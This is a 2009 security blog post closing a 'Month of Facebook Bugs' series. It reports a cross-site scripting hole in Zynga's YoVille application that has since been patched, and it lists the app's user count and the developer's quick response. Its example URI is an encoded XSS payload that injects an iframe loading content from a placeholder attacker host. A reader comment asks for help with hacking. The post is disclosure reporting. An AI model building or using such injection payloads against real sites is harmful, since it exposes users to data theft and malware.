Sep. 30, 2009

Posted by in FAXX Hacks | 4 comments

FAXX Hack: YoVille

We’ve come to the end in the Month of Facebook Bugs – today’s post marks the last published FAXX Hack for September. The series began with a vulnerability in the no. 1 Facebook application, FarmVille from Zynga. Today we end with a very similar hole in another major Zynga application, discovered about two weeks ago.

I have much to cover in recapping this month, and it will likely take a few days to put everything together. I plan on posting a full report that includes statistics and more detailed explanations on how some of these hacks work. Also, as promised, I intend to post demonstration code showing how these holes can be exploited to access user information and spread virally, in addition to standard XSS issues, such as delivering malware.

Thanks for your interest in the Month of Facebook Bugs, and please stay tuned for the upcoming final report.

Facebook Verified Application

Current Monthly Active Users: 17,944,265

Current Rank on Application Leaderboard: 9

Application Developer: Zynga

Responsiveness: Zynga has been one of the most responsive developers I contacted. They replied back quickly and patched the hole soon after.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/yoville/index.php?type=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F

  1. OzzyGreene says:

    t.y. u did well,that was gr8

  2. 2 things 1 can ppl join my website and 2 i need help hacking

Leave a Reply